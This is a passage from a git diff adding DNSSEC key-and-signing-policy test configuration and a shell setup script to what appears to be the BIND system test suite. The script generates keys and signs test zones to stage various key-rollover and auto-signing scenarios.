max-zone-ttl 299; +}; diff --git a/bin/tests/system/kasp/ns3/policies/kasp.conf.in b/bin/tests/system/kasp/ns3/policies/kasp.conf.in new file mode 100644 index 0000000..cb045bc --- /dev/null +++ b/bin/tests/system/kasp/ns3/policies/kasp.conf.in @@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "policies/kasp-fips.conf"; + +dnssec-policy "rsasha1" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 5; + zsk key-directory lifetime P5Y algorithm 5; + zsk key-directory lifetime P1Y algorithm 5 2000; + }; +}; + +dnssec-policy "rsasha1-nsec3" { + dnskey-ttl 1234; + + keys { + ksk key-directory lifetime P10Y algorithm 7; + zsk key-directory lifetime P5Y algorithm 7; + zsk key-directory lifetime P1Y algorithm 7 2000; + }; +}; diff --git a/bin/tests/system/kasp/ns3/setup.sh b/bin/tests/system/kasp/ns3/setup.sh new file mode 100644 index 0000000..8682f54 --- /dev/null +++ b/bin/tests/system/kasp/ns3/setup.sh @@ -0,0 +1,1470 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns3/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + echo "$zone" >> zones +} + +# Set in the key state files the Predecessor/Successor fields. +# Key $1 is the predecessor of key $2. +key_successor() { + id1=$(keyfile_to_key_id "$1") + id2=$(keyfile_to_key_id "$2") + echo "Predecessor: ${id1}" >> "${2}.state" + echo "Successor: ${id2}" >> "${1}.state" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# +# Set up zones that will be initially signed. +# +for zn in default dnssec-keygen some-keys legacy-keys pregenerated \ + rumoured rsasha256 rsasha512 ecdsa256 ecdsa384 \ + dynamic dynamic-inline-signing inline-signing \ + checkds-ksk checkds-doubleksk checkds-csk inherit unlimited \ + manual-rollover multisigner-model2 +do + setup "${zn}.kasp" + cp template.db.in "$zonefile" +done + +# +# Set up RSASHA1 based zones +# +for zn in rsasha1 rsasha1-nsec3 +do + if (cd ..; $SHELL ../testcrypto.sh -q RSASHA1) + then + setup "${zn}.kasp" + cp template.db.in "$zonefile" + else + # don't add to zones. + echo_i "setting up zone: ${zn}.kasp" + cp template.db.in "${zn}.kasp.db" + fi +done + +if [ -f ../ed25519-supported.file ]; then + setup "ed25519.kasp" + cp template.db.in "$zonefile" + cat ed25519.conf >> named.conf +fi + +if [ -f ../ed448-supported.file ]; then + setup "ed448.kasp" + cp template.db.in "$zonefile" + cat ed448.conf >> named.conf +fi + +# Set up zones that stay unsigned. +for zn in unsigned insecure max-zone-ttl +do + zone="${zn}.kasp" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" + cp template.db.in $infile + cp template.db.in $zonefile +done + +# Some of these zones already have keys. +zone="dnssec-keygen.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.1 2>&1 + +zone="some-keys.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -G -a RSASHA256 -b 2048 -L 1234 $zone > keygen.out.$zone.1 2>&1 +$KEYGEN -G -a RSASHA256 -f KSK -L 1234 $zone > keygen.out.$zone.2 2>&1 + +zone="legacy-keys.kasp" +echo_i "setting up zone: $zone" +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 1234 $zone 2> keygen.out.$zone.1) +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $zone 2> keygen.out.$zone.2) +echo $ZSK > legacy-keys.kasp.zsk +echo $KSK > legacy-keys.kasp.ksk +# Predecessor keys: +Tact="now-9mo" +Tret="now-3mo" +ZSK=$($KEYGEN -a RSASHA256 -b 2048 -L 1234 $zone 2> keygen.out.$zone.3) +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $zone 2> keygen.out.$zone.4) +$SETTIME -P $Tact -A $Tact -I $Tret -D $Tret "$ZSK" > settime.out.$zone.1 2>&1 +$SETTIME -P $Tact -A $Tact -I $Tret -D $Tret "$KSK" > settime.out.$zone.2 2>&1 + +zone="pregenerated.kasp" +echo_i "setting up zone: $zone" +$KEYGEN -G -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.1 2>&1 +$KEYGEN -G -k rsasha256 -l policies/kasp.conf $zone > keygen.out.$zone.2 2>&1 + +zone="multisigner-model2.kasp" +echo_i "setting up zone: $zone" +# Import the ZSK sets of the other providers into their DNSKEY RRset. +ZSK1=$($KEYGEN -K ../ -a $DEFAULT_ALGORITHM -L 3600 $zone 2> keygen.out.$zone.1) +ZSK2=$($KEYGEN -K ../ -a $DEFAULT_ALGORITHM -L 3600 $zone 2> keygen.out.$zone.2) +# ZSK1 will be added to the unsigned zonefile. +cat "../${ZSK1}.key" | grep -v ";.*" >> "${zone}.db" +cat "../${ZSK1}.key" | grep -v ";.*" > "${zone}.zsk1" +rm -f "../${ZSK1}.*" +# ZSK2 will be used with a Dynamic Update. +cat "../${ZSK2}.key" | grep -v ";.*" > "${zone}.zsk2" +rm -f "../${ZSK2}.*" + +zone="rumoured.kasp" +echo_i "setting up zone: $zone" +Tpub="now" +Tact="now+1d" +keytimes="-P ${Tpub} -A ${Tact}" +KSK=$($KEYGEN -a RSASHA256 -f KSK -L 1234 $keytimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a RSASHA256 -b 3072 -L 1234 $keytimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a RSASHA256 -L 1234 $keytimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $R $Tpub -r $R $Tpub -d $H $Tpub "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $Tpub -z $R $Tpub "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $R $Tpub -z $R $Tpub "$ZSK2" > settime.out.$zone.2 2>&1 + +# +# Set up zones that are already signed. +# + +# Zone to test manual rollover. +setup manual-rollover.kasp +T="now-1d" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -PS -x -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are set to expire long in the past, update immediately. +setup expired-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -PS -x -s now-2mo -e now-1mo -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, and can be reused. +setup fresh-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, but not fresh enough, update immediately. +setup unfresh-sigs.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# These signatures are still good, but the private KSK is missing. +setup ksk-missing.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +echo "KSK: yes" >> "${KSK}".state +echo "ZSK: no" >> "${KSK}".state +echo "Lifetime: 63072000" >> "${KSK}".state # PT2Y +rm -f "${KSK}".private + +# These signatures are still good, but the private ZSK is missing. +setup zsk-missing.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1w -e now+1w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +echo "KSK: no" >> "${ZSK}".state +echo "ZSK: yes" >> "${ZSK}".state +echo "Lifetime: 31536000" >> "${ZSK}".state # PT1Y +rm -f "${ZSK}".private + +# These signatures are already expired, and the private ZSK is retired. +setup zsk-retired.autosign +T="now-6mo" +ksktimes="-P $T -A $T -P sync $T" +zsktimes="-P $T -A $T -I now" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 300 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -d $O $T -k $O $T -r $O $T "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -PS -x -s now-2w -e now-1mi -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +$SETTIME -s -g HIDDEN "$ZSK" > settime.out.$zone.3 2>&1 + +# +# The zones at enable-dnssec.autosign represent the various steps of the +# initial signing of a zone. +# + +# Step 1: +# This is an unsigned zone and named should perform the initial steps of +# introducing the DNSSEC records in the right order. +setup step1.enable-dnssec.autosign +cp template.db.in $zonefile + +# Step 2: +# The DNSKEY has been published long enough to become OMNIPRESENT. +setup step2.enable-dnssec.autosign +# DNSKEY TTL: 300 seconds +# zone-propagation-delay: 5 minutes (300 seconds) +# publish-safety: 5 minutes (300 seconds) +# Total: 900 seconds +TpubN="now-900s" +# RRSIG TTL: 12 hour (43200 seconds) +# zone-propagation-delay: 5 minutes (300 seconds) +# retire-safety: 20 minutes (1200 seconds) +# Already passed time: -900 seconds +# Total: 43800 seconds +TsbmN="now+43800s" +keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}" +CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $R $TpubN -r $R $TpubN -d $H $TpubN -z $R $TpubN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# The zone signatures have been published long enough to become OMNIPRESENT. +setup step3.enable-dnssec.autosign +# Passed time since publications: 43800 + 900 = 44700 seconds. +TpubN="now-44700s" +# The key is secure for using in chain of trust when the DNSKEY is OMNIPRESENT. +TcotN="now-43800s" +# We can submit the DS now. +TsbmN="now" +keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}" +CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TcotN -r $O $TcotN -d $H $TpubN -z $R $TpubN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS has been submitted long enough ago to become OMNIPRESENT. +setup step4.enable-dnssec.autosign +# DS TTL: 2 hour (7200 seconds) +# parent-propagation-delay: 1 hour (3600 seconds) +# retire-safety: 20 minutes (1200 seconds) +# Total aditional time: 12000 seconds +# 44700 + 12000 = 56700 +TpubN="now-56700s" +# 43800 + 12000 = 55800 +TcotN="now-55800s" +TsbmN="now-12000s" +keytimes="-P ${TpubN} -P sync ${TsbmN} -A ${TpubN}" +CSK=$($KEYGEN -k enable-dnssec -l policies/autosign.conf $keytimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -P ds $TsbmN -k $O $TcotN -r $O $TcotN -d $R $TsbmN -z $O $TsbmN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +setup step4.enable-dnssec.autosign + +# +# The zones at zsk-prepub.autosign represent the various steps of a ZSK +# Pre-Publication rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.zsk-prepub.autosign +TactN="now" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# It is time to pre-publish the successor ZSK. +setup step2.zsk-prepub.autosign +# According to RFC 7583: +# +# Tpub(N+1) <= Tact(N) + Lzsk - Ipub +# Ipub = Dprp + TTLkey (+publish-safety) +# +# |3| |4| |5| |6| +# | | | | +# Key N |<-------Lzsk------>| +# | | | | +# Key N+1 | |<-Ipub->|<-->| +# | | | | +# Key N Tact +# Key N+1 Tpub Trdy Tact +# +# Tnow +# +# Lzsk: 30d +# Dprp: 1h +# TTLkey: 1h +# publish-safety: 1d +# Ipub: 26h +# +# Tact(N) = Tnow + Ipub - Lzsk = now + 26h - 30d +# = now + 26h - 30d = now − 694h +TactN="now-694h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# After the publication interval has passed the DNSKEY of the successor ZSK +# is OMNIPRESENT and the zone can thus be signed with the successor ZSK. +setup step3.zsk-prepub.autosign +# According to RFC 7583: +# +# Tpub(N+1) <= Tact(N) + Lzsk - Ipub +# Tret(N) = Tact(N+1) = Tact(N) + Lzsk +# Trem(N) = Tret(N) + Iret +# Iret = Dsgn + Dprp + TTLsig (+retire-safety) +# +# |3| |4| |5| |6| |7| |8| +# | | | | | | +# Key N |<-------Lzsk------>|<-Iret->|<--->| +# | | | | | | +# Key N+1 | |<-Ipub->|<-->|<---Lzsk---- - - +# | | | | | | +# Key N Tact Tret Tdea Trem +# Key N+1 Tpub Trdy Tact +# +# Tnow +# +# Lzsk: 30d +# Ipub: 26h +# Dsgn: 1w +# Dprp: 1h +# TTLsig: 1d +# retire-safety: 2d +# Iret: 10d1h = 241h +# +# Tact(N) = Tnow - Lzsk = now - 30d +# Tret(N) = now +# Trem(N) = Tnow + Iret = now + 241h +# Tpub(N+1) = Tnow - Ipub = now - 26h +# Tret(N+1) = Tnow + Lzsk = now + 30d +# Trem(N+1) = Tnow + Lzsk + Iret = now + 30d + 241h +# = now + 961h +TactN="now-30d" +TretN="now" +TremN="now+241h" +TpubN1="now-26h" +TactN1="now" +TretN1="now+30d" +TremN1="now+961h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $O $TactN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -z $H $TpubN1 "$ZSK2" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $ZSK1 $ZSK2 +# Sign zone. +cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# After the retire interval has passed the predecessor DNSKEY can be +# removed from the zone. +setup step4.zsk-prepub.autosign +# According to RFC 7583: +# +# Tret(N) = Tact(N) + Lzsk +# Tdea(N) = Tret(N) + Iret +# +# |3| |4| |5| |6| |7| |8| +# | | | | | | +# Key N |<-------Lzsk------>|<-Iret->|<--->| +# | | | | | | +# Key N+1 | |<-Ipub->|<-->|<---Lzsk---- - - +# | | | | | | +# Key N Tact Tret Tdea Trem +# Key N+1 Tpub Trdy Tact +# +# Tnow +# +# Lzsk: 30d +# Ipub: 26h +# Iret: 241h +# +# Tact(N) = Tnow - Iret - Lzsk +# = now - 241h - 30d = now - 241h - 720h +# = now - 961h +# Tret(N) = Tnow - Iret = now - 241h +# Trem(N) = Tnow +# Tpub(N+1) = Tnow - Iret - Ipub +# = now - 241h - 26h +# = now - 267h +# Tact(N+1) = Tnow - Iret = Tret(N) +# Tret(N+1) = Tnow - Iret + Lzsk +# = now - 241h + 30d = now - 241h + 720h +# = now + 479h +# Trem(N+1) = Tnow + Lzsk = now + 30d +TactN="now-961h" +TretN="now-241h" +TremN="now" +TpubN1="now-267h" +TactN1="${TretN}" +TretN1="now+479h" +TremN1="now+30d" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $O $TactN -z $U $TretN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -z $R $TactN1 "$ZSK2" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $ZSK1 $ZSK2 +# Sign zone. +cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile" +cp $infile $zonefile +$SIGNER -PS -x -s now-2w -e now-1mi -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The predecessor DNSKEY is removed long enough that is has become HIDDEN. +setup step5.zsk-prepub.autosign +# Subtract DNSKEY TTL from all the times (1h). +# Tact(N) = now - 961h - 1h = now - 962h +# Tret(N) = now - 241h - 1h = now - 242h +# Tdea(N) = now - 2d - 1h = now - 49h +# Trem(N) = now - 1h +# Tpub(N+1) = now - 267h - 1h = now - 268h +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 479h - 1h = now + 478h +# Trem(N+1) = now + 30d - 1h = now + 719h +TactN="now-962h" +TretN="now-242h" +TremN="now-1h" +TdeaN="now-49h" +TpubN1="now-268h" +TactN1="${TretN}" +TretN1="now+478h" +TremN1="now+719h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $U $TdeaN -z $H $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -z $O $TdeaN "$ZSK2" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $ZSK1 $ZSK2 +# Sign zone. +cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The predecessor DNSKEY can be purged. +setup step6.zsk-prepub.autosign +# Subtract purge-keys interval from all the times (1h). +# Tact(N) = now - 962h - 1h = now - 963h +# Tret(N) = now - 242h - 1h = now - 243h +# Tdea(N) = now - 49h - 1h = now - 50h +# Trem(N) = now - 1h - 1h = now - 2h +# Tpub(N+1) = now - 268h - 1h = now - 269h +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 478h - 1h = now + 477h +# Trem(N+1) = now + 719h - 1h = now + 718h +TactN="now-963h" +TretN="now-243h" +TremN="now-2h" +TdeaN="now-50h" +TpubN1="now-269h" +TactN1="${TretN}" +TretN1="now+477h" +TremN1="now+718h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +ZSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 3600 $newtimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $H -k $H $TdeaN -z $H $TdeaN "$ZSK1" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -z $O $TdeaN "$ZSK2" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $ZSK1 $ZSK2 +# Sign zone. +cat template.db.in "${KSK}.key" "${ZSK1}.key" "${ZSK2}.key" > "$infile" +private_type_record $zone 